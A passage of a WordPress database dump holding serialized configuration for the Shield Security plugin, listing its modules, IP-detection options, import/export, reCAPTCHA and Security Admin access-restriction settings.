Shield\";}i:5;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:27:{i:0;a:9:{s:3:\"key\";s:29:\"global_enable_plugin_features\";s:7:\"section\";s:31:\"section_global_security_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:33:\"Enable/Disable All Plugin Modules\";s:7:\"summary\";s:27:\"Global Plugin On/Off Switch\";s:11:\"description\";s:50:\"Uncheck this option to disable all Shield features\";}i:1;a:9:{s:3:\"key\";s:15:\"enable_tracking\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/7i\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:28:\"Enable Information Gathering\";s:7:\"summary\";s:44:\"Permit Anonymous Usage Information Gathering\";s:11:\"description\";s:198:\"Allows us to gather information on statistics and features in-use across our client installations. This information is strictly anonymous and contains no personally, or otherwise, identifiable data.\";}i:2;a:11:{s:3:\"key\";s:22:\"visitor_address_source\";s:7:\"section\";s:16:\"section_defaults\";s:9:\"sensitive\";b:0;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:14:\"AUTO_DETECT_IP\";s:13:\"value_options\";a:11:{i:0;a:2:{s:9:\"value_key\";s:14:\"AUTO_DETECT_IP\";s:4:\"text\";s:31:\"Automatically Detect Visitor IP\";}i:1;a:2:{s:9:\"value_key\";s:11:\"REMOTE_ADDR\";s:4:\"text\";s:11:\"REMOTE_ADDR\";}i:2;a:2:{s:9:\"value_key\";s:21:\"HTTP_CF_CONNECTING_IP\";s:4:\"text\";s:21:\"HTTP_CF_CONNECTING_IP\";}i:3;a:2:{s:9:\"value_key\";s:20:\"HTTP_X_FORWARDED_FOR\";s:4:\"text\";s:20:\"HTTP_X_FORWARDED_FOR\";}i:4;a:2:{s:9:\"value_key\";s:16:\"HTTP_X_FORWARDED\";s:4:\"text\";s:16:\"HTTP_X_FORWARDED\";}i:5;a:2:{s:9:\"value_key\";s:14:\"HTTP_X_REAL_IP\";s:4:\"text\";s:14:\"HTTP_X_REAL_IP\";}i:6;a:2:{s:9:\"value_key\";s:22:\"HTTP_X_SUCURI_CLIENTIP\";s:4:\"text\";s:22:\"HTTP_X_SUCURI_CLIENTIP\";}i:7;a:2:{s:9:\"value_key\";s:20:\"HTTP_INCAP_CLIENT_IP\";s:4:\"text\";s:20:\"HTTP_INCAP_CLIENT_IP\";}i:8;a:2:{s:9:\"value_key\";s:22:\"HTTP_X_SP_FORWARDED_IP\";s:4:\"text\";s:22:\"HTTP_X_SP_FORWARDED_IP\";}i:9;a:2:{s:9:\"value_key\";s:14:\"HTTP_FORWARDED\";s:4:\"text\";s:14:\"HTTP_FORWARDED\";}i:10;a:2:{s:9:\"value_key\";s:14:\"HTTP_CLIENT_IP\";s:4:\"text\";s:14:\"HTTP_CLIENT_IP\";}}s:9:\"link_info\";s:18:\"https://icwp.io/dn\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"Visitor IP Address\";s:7:\"summary\";s:22:\"Which Address Is Yours\";s:11:\"description\";s:85:\"There are many way to detect visitor IP addresses. Please select yours from the list.\";}i:3;a:10:{s:3:\"key\";s:24:\"block_send_email_address\";s:7:\"section\";s:16:\"section_defaults\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Report Email\";s:7:\"summary\";s:27:\"Where to send email reports\";s:11:\"description\";s:66:\"If this is empty, it will default to the blog admin email address.\";}i:4;a:9:{s:3:\"key\";s:27:\"enable_upgrade_admin_notice\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"In-Plugin Notices\";s:7:\"summary\";s:31:\"Display Plugin Specific Notices\";s:11:\"description\";s:105:\"Disable this option to hide certain plugin admin notices about available updates and post-update notices.\";}i:5;a:9:{s:3:\"key\";s:20:\"display_plugin_badge\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/5v\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf20\";s:4:\"name\";s:17:\"Show Plugin Badge\";s:7:\"summary\";s:33:\"Display Plugin Badge On Your Site\";s:11:\"description\";s:187:\"Enabling this option helps support the plugin by spreading the word about it on your website. The plugin badge also demonstrates to visitors that you take your website security seriously.\";}i:6;a:9:{s:3:\"key\";s:27:\"enable_xmlrpc_compatibility\";s:7:\"section\";s:16:\"section_defaults\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"XML-RPC Compatibility\";s:7:\"summary\";s:56:\"Allow Login Through XML-RPC To By-Pass Login Guard Rules\";s:11:\"description\";s:95:\"Enable this if you need XML-RPC functionality e.g. if you use the WordPress iPhone/Android App.\";}i:7;a:10:{s:3:\"key\";s:19:\"importexport_enable\";s:7:\"section\";s:20:\"section_importexport\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/do\";s:9:\"link_blog\";s:18:\"https://icwp.io/dp\";s:4:\"name\";s:19:\"Allow Import/Export\";s:7:\"summary\";s:65:\"Allow Import Of Options To, And Export Of Options From, This Site\";s:11:\"description\";s:68:\"Uncheck this box to completely disable import and export of options.\";}i:8;a:9:{s:3:\"key\";s:22:\"importexport_masterurl\";s:7:\"section\";s:20:\"section_importexport\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Auto-Import URL\";s:7:\"summary\";s:43:\"Automatically Import Options From This Site\";s:11:\"description\";s:115:\"Supplying a valid site URL here will make this site an \'Options Slave\' and will automatically import options daily.\";}i:9;a:11:{s:3:\"key\";s:22:\"importexport_whitelist\";s:7:\"section\";s:20:\"section_importexport\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Export Whitelist\";s:7:\"summary\";s:68:\"Whitelisted Sites Which Do Not Need The Secret Key To Export Options\";s:11:\"description\";s:132:\"Each site on this list will be able to export options from this site without providing the secret key. Take a new line for each URL.\";}i:10;a:10:{s:3:\"key\";s:29:\"importexport_whitelist_notify\";s:7:\"section\";s:20:\"section_importexport\";s:9:\"sensitive\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Notify Whitelist\";s:7:\"summary\";s:59:\"Notify Sites On The Whitelist To Update Options From Master\";s:11:\"description\";s:110:\"When enabled, manual options saving will notify sites on the whitelist to export options from the Master site.\";}i:11;a:11:{s:3:\"key\";s:22:\"importexport_secretkey\";s:7:\"section\";s:20:\"section_importexport\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:16:\"noneditable_text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"Secret Key\";s:7:\"summary\";s:24:\"Import/Export Secret Key\";s:11:\"description\";s:79:\"Keep this Secret Key private as it will allow the import and export of options.\";}i:12;a:9:{s:3:\"key\";s:20:\"delete_on_deactivate\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Delete Plugin Settings\";s:7:\"summary\";s:51:\"Delete All Plugin Settings Upon Plugin Deactivation\";s:11:\"description\";s:67:\"Careful: Removes all plugin options when you deactivate the plugin.\";}i:13;a:11:{s:3:\"key\";s:22:\"google_recaptcha_style\";s:7:\"section\";s:26:\"section_third_party_google\";s:7:\"premium\";b:1;s:7:\"default\";s:5:\"light\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:1;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:2;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:18:\"https://icwp.io/dq\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"reCAPTCHA Style\";s:7:\"summary\";s:49:\"How Google reCAPTCHA Will Be Displayed By Default\";s:11:\"description\";s:109:\"You can choose the reCAPTCHA display format that best suits your site, including the new Invisible Recaptcha.\";}i:14;a:10:{s:3:\"key\";s:25:\"google_recaptcha_site_key\";s:7:\"section\";s:26:\"section_third_party_google\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:21:\"https://icwp.io/shld5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"reCAPTCHA Site Key\";s:7:\"summary\";s:67:\"Google reCAPTCHA Site Key - Only v2 or Invisible. v3 NOT supported.\";s:11:\"description\";s:67:\"Enter your Google reCAPTCHA site key for use throughout the plugin.\";}i:15;a:10:{s:3:\"key\";s:27:\"google_recaptcha_secret_key\";s:7:\"section\";s:26:\"section_third_party_google\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:21:\"https://icwp.io/shld5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"reCAPTCHA Secret\";s:7:\"summary\";s:69:\"Google reCAPTCHA Secret Key - Only v2 or Invisible. v3 NOT supported.\";s:11:\"description\";s:69:\"Enter your Google reCAPTCHA secret key for use throughout the plugin.\";}i:16;a:5:{s:3:\"key\";s:21:\"tracking_last_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:17;a:5:{s:3:\"key\";s:22:\"unique_installation_id\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";i:0;}i:18;a:4:{s:3:\"key\";s:26:\"tracking_permission_set_at\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:19;a:5:{s:3:\"key\";s:17:\"installation_time\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:20;a:5:{s:3:\"key\";s:12:\"activated_at\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:21;a:5:{s:3:\"key\";s:33:\"importexport_secretkey_expires_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:22;a:5:{s:3:\"key\";s:33:\"importexport_handshake_expires_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:23;a:5:{s:3:\"key\";s:29:\"importexport_last_import_hash\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:24;a:6:{s:3:\"key\";s:22:\"this_server_ip_details\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:25;a:5:{s:3:\"key\";s:21:\"last_ip_detect_source\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:26;a:5:{s:3:\"key\";s:19:\"openssl_private_key\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}}s:11:\"definitions\";a:16:{s:12:\"survey_email\";s:36:\"c3VwcG9ydEBvbmVkb2xsYXJwbHVnaW4uY29t\";s:13:\"help_video_id\";s:0:\"\";s:20:\"tracking_cron_handle\";s:20:\"plugin_tracking_cron\";s:17:\"tracking_post_url\";s:51:\"https://tracking.icontrolwp.com/track/plugin/shield\";s:22:\"importexport_cron_name\";s:10:\"autoimport\";s:19:\"href_privacy_policy\";s:37:\"https://icwp.io/wpshieldprivacypolicy\";s:10:\"db_classes\";a:2:{s:5:\"geoip\";s:64:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\GeoIp\\Handler\";s:5:\"notes\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\AdminNotes\\Handler\";}s:19:\"db_autoexpire_notes\";i:0;s:19:\"db_autoexpire_geoip\";i:30;s:13:\"db_notes_name\";s:5:\"notes\";s:22:\"db_notes_table_columns\";a:5:{i:0;s:2:\"id\";i:1;s:11:\"wp_username\";i:2;s:4:\"note\";i:3;s:10:\"created_at\";i:4;s:10:\"deleted_at\";}s:16:\"geoip_table_name\";s:5:\"geoip\";s:19:\"geoip_table_columns\";a:5:{i:0;s:2:\"id\";i:1;s:2:\"ip\";i:2;s:4:\"meta\";i:3;s:10:\"created_at\";i:4;s:10:\"deleted_at\";}s:22:\"active_plugin_features\";a:17:{i:0;a:4:{s:4:\"slug\";s:8:\"insights\";s:11:\"storage_key\";s:8:\"insights\";s:13:\"load_priority\";i:1;s:13:\"menu_priority\";i:5;}i:1;a:3:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:11:\"storage_key\";s:24:\"admin_access_restriction\";s:13:\"load_priority\";i:11;}i:2;a:3:{s:4:\"slug\";s:3:\"ips\";s:11:\"storage_key\";s:3:\"ips\";s:13:\"load_priority\";i:15;}i:3;a:2:{s:4:\"slug\";s:12:\"hack_protect\";s:11:\"storage_key\";s:12:\"hack_protect\";}i:4;a:2:{s:4:\"slug\";s:13:\"login_protect\";s:11:\"storage_key\";s:12:\"loginprotect\";}i:5;a:3:{s:4:\"slug\";s:8:\"firewall\";s:11:\"storage_key\";s:8:\"firewall\";s:13:\"load_priority\";i:1000;}i:6;a:2:{s:4:\"slug\";s:15:\"user_management\";s:11:\"storage_key\";s:15:\"user_management\";}i:7;a:2:{s:4:\"slug\";s:15:\"comments_filter\";s:11:\"storage_key\";s:14:\"commentsfilter\";}i:8;a:2:{s:4:\"slug\";s:11:\"autoupdates\";s:11:\"storage_key\";s:11:\"autoupdates\";}i:9;a:2:{s:4:\"slug\";s:7:\"headers\";s:11:\"storage_key\";s:7:\"headers\";}i:10;a:2:{s:4:\"slug\";s:8:\"lockdown\";s:11:\"storage_key\";s:8:\"lockdown\";}i:11;a:3:{s:4:\"slug\";s:6:\"events\";s:11:\"storage_key\";s:6:\"events\";s:13:\"load_priority\";i:11;}i:12;a:3:{s:4:\"slug\";s:8:\"sessions\";s:11:\"storage_key\";s:8:\"sessions\";s:13:\"load_priority\";i:5;}i:13;a:4:{s:4:\"slug\";s:11:\"audit_trail\";s:11:\"storage_key\";s:11:\"audit_trail\";s:13:\"load_priority\";i:11;s:6:\"hidden\";b:0;}i:14;a:4:{s:4:\"slug\";s:7:\"traffic\";s:11:\"storage_key\";s:7:\"traffic\";s:13:\"load_priority\";i:12;s:7:\"min_php\";s:3:\"5.4\";}i:15;a:3:{s:4:\"slug\";s:7:\"license\";s:11:\"storage_key\";s:7:\"license\";s:13:\"load_priority\";i:10;}i:16;a:2:{s:4:\"slug\";s:5:\"email\";s:11:\"storage_key\";s:5:\"email\";}}s:6:\"events\";a:10:{s:13:\"test_cron_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:18:\"import_notify_sent\";a:1:{s:4:\"stat\";b:0;}s:22:\"import_notify_received\";a:1:{s:4:\"stat\";b:0;}s:16:\"options_exported\";a:2:{s:4:\"stat\";b:1;s:6:\"recent\";b:1;}s:16:\"options_imported\";a:2:{s:4:\"stat\";b:1;s:6:\"recent\";b:1;}s:20:\"whitelist_site_added\";a:1:{s:4:\"stat\";b:0;}s:22:\"whitelist_site_removed\";a:1:{s:4:\"stat\";b:0;}s:14:\"master_url_set\";a:1:{s:4:\"stat\";b:0;}s:17:\"recaptcha_success\";a:1:{s:5:\"audit\";b:0;}s:14:\"recaptcha_fail\";a:1:{s:5:\"audit\";b:1;}}s:7:\"wizards\";a:1:{s:7:\"welcome\";a:4:{s:5:\"title\";s:28:\"Getting Started Setup Wizard\";s:4:\"desc\";s:106:\"An introduction to this security plugin, helping you get setup and started quickly with the core features.\";s:20:\"min_user_permissions\";s:14:\"manage_options\";s:5:\"steps\";a:10:{s:7:\"welcome\";a:2:{s:14:\"security_admin\";b:0;s:5:\"title\";s:7:\"Welcome\";}s:9:\"ip_detect\";a:1:{s:5:\"title\";s:12:\"IP Detection\";}s:24:\"admin_access_restriction\";a:1:{s:5:\"title\";s:14:\"Security Admin\";}s:11:\"audit_trail\";a:1:{s:5:\"title\";s:11:\"Audit Trail\";}s:3:\"ips\";a:1:{s:5:\"title\";s:12:\"IP Blacklist\";}s:13:\"login_protect\";a:1:{s:5:\"title\";s:16:\"Login Protection\";}s:15:\"comments_filter\";a:1:{s:5:\"title\";s:12:\"Comment SPAM\";}s:16:\"how_shield_works\";a:1:{s:5:\"title\";s:16:\"How Shield Works\";}s:5:\"optin\";a:1:{s:5:\"title\";s:8:\"Join Us!\";}s:8:\"thankyou\";a:2:{s:14:\"security_admin\";b:0;s:5:\"title\";s:10:\"Thank You!\";}}}}}s:10:\"meta_modts\";i:1572181749;}'),(33625,1,'shield_mod_config_cc45dbc1dde4bebfe7c6429057e6fc92','a:6:{s:4:\"slug\";s:8:\"insights\";s:10:\"properties\";a:14:{s:4:\"slug\";s:8:\"insights\";s:4:\"name\";s:9:\"Dashboard\";s:10:\"menu_title\";s:18:\"Security Dashboard\";s:13:\"menu_priority\";s:1:\"5\";s:21:\"show_module_menu_item\";b:1;s:19:\"show_module_options\";b:0;s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:8:\"insights\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;}s:12:\"requirements\";a:1:{s:3:\"php\";a:1:{s:7:\"version\";s:3:\"5.4\";}}s:8:\"sections\";a:1:{i:0;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:0:{}s:10:\"meta_modts\";i:1572181749;}'),(33626,1,'shield_mod_config_a09cb610aca7cbf24407b33a1ca50ff9','a:7:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:10:\"properties\";a:13:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:4:\"name\";s:14:\"Security Admin\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:24:\"admin_access_restriction\";s:7:\"tagline\";s:58:\"Protect your Security Plugin, not just your WordPress site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:20;}s:13:\"admin_notices\";a:2:{s:26:\"certain-options-restricted\";a:5:{s:2:\"id\";s:26:\"certain-options-restricted\";s:8:\"schedule\";s:10:\"conditions\";s:12:\"plugin_admin\";s:2:\"no\";s:8:\"per_user\";b:1;s:4:\"type\";s:7:\"warning\";}s:22:\"admin-users-restricted\";a:5:{s:2:\"id\";s:22:\"admin-users-restricted\";s:8:\"schedule\";s:10:\"conditions\";s:12:\"plugin_admin\";s:2:\"no\";s:4:\"type\";s:7:\"warning\";s:8:\"per_user\";b:1;}}s:8:\"sections\";a:5:{i:0;a:6:{s:4:\"slug\";s:41:\"section_admin_access_restriction_settings\";s:7:\"primary\";b:1;s:5:\"title\";s:35:\"Security Admin Restriction Settings\";s:11:\"title_short\";s:23:\"Security Admin Settings\";s:7:\"summary\";a:2:{i:0;s:52:\"Purpose - Restrict access using a simple Access Key.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}s:13:\"help_video_id\";s:9:\"338551188\";}i:1;a:5:{s:4:\"slug\";s:38:\"section_admin_access_restriction_areas\";s:5:\"title\";s:32:\"Security Admin Restriction Zones\";s:11:\"title_short\";s:24:\"Access Restriction Zones\";s:7:\"summary\";a:2:{i:0;s:120:\"Purpose - Restricts access to key WordPress areas for all users not authenticated with the Security Admin Access system.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}s:13:\"help_video_id\";s:9:\"339824074\";}i:2;a:4:{s:4:\"slug\";s:18:\"section_whitelabel\";s:5:\"title\";s:18:\"Shield White Label\";s:11:\"title_short\";s:11:\"White Label\";s:7:\"summary\";a:1:{i:0;s:92:\"Purpose - Rename and re-brand the Shield Security plugin for your client site installations.\";}}i:3;a:4:{s:4:\"slug\";s:54:\"section_enable_plugin_feature_admin_access_restriction\";s:5:\"title\";s:39:\"Enable Module: WordPress Security Admin\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:3:{i:0;s:100:\"Purpose - Restricts access to this plugin preventing unauthorized changes to your security settings.\";i:1;s:59:\"Recommendation - Keep the Security Admin feature turned on.\";i:2;s:63:\"You need to also enter a new Access Key to enable this feature.\";}}i:4;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:19:{i:0;a:9:{s:3:\"key\";s:31:\"enable_admin_access_restriction\";s:7:\"section\";s:54:\"section_enable_plugin_feature_admin_access_restriction\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/40\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf02\";s:4:\"name\";s:21:\"Enable Security Admin\";s:7:\"summary\";s:41:\"Enforce Security Admin Access Restriction\";s:11:\"description\";s:157:\"Enable this with great care and consideration. When this Access Key option is enabled, you must specify a key below and use it to gain access to this plugin.\";}i:1;a:10:{s:3:\"key\";s:16:\"admin_access_key\";s:7:\"section\";s:41:\"section_admin_access_restriction_settings\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:9:\"link_info\";s:18:\"https://icwp.io/42\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:25:\"Security Admin Access Key\";s:7:\"summary\";s:40:\"Provide/Update Security Admin Access Key\";s:11:\"description\";s:92:\"Careful: If you forget this, you could potentially lock yourself out from using this plugin.\";}i:2;a:11:{s:3:\"key\";s:15:\"sec_admin_users\";s:7:\"section\";s:41:\"section_admin_access_restriction_settings\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:18:\"https://icwp.io/dk\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Security Admins\";s:7:\"summary\";s:26:\"Persistent Security Admins\";s:11:\"description\";s:79:\"All emails, usernames, or user IDs entered here will always be Security Admins.\";}i:3;a:10:{s:3:\"key\";s:20:\"admin_access_timeout\";s:7:\"section\";s:41:\"section_admin_access_restriction_settings\";s:7:\"default\";i:30;s:4:\"type\";s:7:\"integer\";s:3:\"min\";i:1;s:9:\"link_info\";s:18:\"https://icwp.io/41\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Security Admin Timeout\";s:7:\"summary\";s:63:\"Specify An Automatic Timeout Interval For Security Admin Access\";s:11:\"description\";s:133:\"This will automatically expire your Security Admin Session. Does not apply until you enter the access key again. Default: 60 minutes.\";}i:4;a:9:{s:3:\"key\";s:29:\"admin_access_restrict_options\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/a0\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf32\";s:4:\"name\";s:5:\"Pages\";s:7:\"summary\";s:56:\"Restrict Access To Key WordPress Posts And Pages Actions\";s:11:\"description\";s:140:\"Careful: This will restrict access to page/post creation, editing and deletion. Note: Selecting \'Edit\' will also restrict all other options.\";}i:5;a:9:{s:3:\"key\";s:33:\"admin_access_restrict_admin_users\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/a0\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"Admin Users\";s:7:\"summary\";s:57:\"Restrict Access To Create/Delete/Modify Other Admin Users\";s:11:\"description\";s:127:\"Careful: This will restrict the ability of WordPress administrators from creating, modifying or promoting other administrators.\";}i:6;a:9:{s:3:\"key\";s:29:\"admin_access_restrict_plugins\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:16:\"activate_plugins\";s:4:\"text\";s:8:\"Activate\";}i:1;a:2:{s:9:\"value_key\";s:15:\"install_plugins\";s:4:\"text\";s:7:\"Install\";}i:2;a:2:{s:9:\"value_key\";s:14:\"update_plugins\";s:4:\"text\";s:6:\"Update\";}i:3;a:2:{s:9:\"value_key\";s:14:\"delete_plugins\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:18:\"https://icwp.io/a0\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf21\";s:7:\"summary\";s:47:\"Restrict Access To Key WordPress Plugin Actions\";s:11:\"description\";s:156:\"Careful: This will restrict access to plugin installation, update, activation and deletion. Note: Selecting \'Activate\' will also restrict all other options.\";}i:7;a:9:{s:3:\"key\";s:28:\"admin_access_restrict_themes\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:13:\"switch_themes\";s:4:\"text\";s:8:\"Activate\";}i:1;a:2:{s:9:\"value_key\";s:18:\"edit_theme_options\";s:4:\"text\";s:18:\"Edit Theme Options\";}i:2;a:2:{s:9:\"value_key\";s:14:\"install_themes\";s:4:\"text\";s:7:\"Install\";}i:3;a:2:{s:9:\"value_key\";s:13:\"update_themes\";s:4:\"text\";s:6:\"Update\";}i:4;a:2:{s:9:\"value_key\";s:13:\"delete_themes\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:18:\"https://icwp.io/a0\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf21\";s:7:\"summary\";s:42:\"Restrict Access To WordPress Theme Actions\";s:11:\"description\";s:90:\"Careful: This will restrict access to theme installation, update, activation and deletion.\";}i:8;a:9:{s:3:\"key\";s:27:\"admin_access_restrict_posts\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:4:\"edit\";s:4:\"text\";s:11:\"Create/Edit\";}i:1;a:2:{s:9:\"value_key\";s:7:\"publish\";s:4:\"text\";s:7:\"Publish\";}i:2;a:2:{s:9:\"value_key\";s:6:\"delete\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:18:\"https://icwp.io/a0\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf21\";s:7:\"summary\";s:56:\"Restrict Access To Key WordPress Posts And Pages Actions\";s:11:\"description\";s:79:\"Careful: This will restrict access to page/post creation, editing and deletion.\";}i:9;a:10:{s:3:\"key\";s:17:\"whitelabel_enable\";s:7:\"section\";s:18:\"section_whitelabel\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/dr\";s:9:\"link_blog\";s:18:\"https://icwp.io/ds\";s:4:\"name\";s:18:\"Enable White Label\";s:7:\"summary\";s:34:\"Activate Your White Label Settings\";s:11:\"description\";s:61:\"Use this option to turn on/off the whole White Label feature.\";}i:10;a:9:{s:3:\"key\";s:15:\"wl_hide_updates\";s:7:\"section\";s:18:\"section_whitelabel\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Hide Updates\";s:7:\"summary\";s:47:\"Hide Available Updates From Non Security Admins\";s:11:\"description\";s:66:\"Hides the availability of Shield updates from non-security 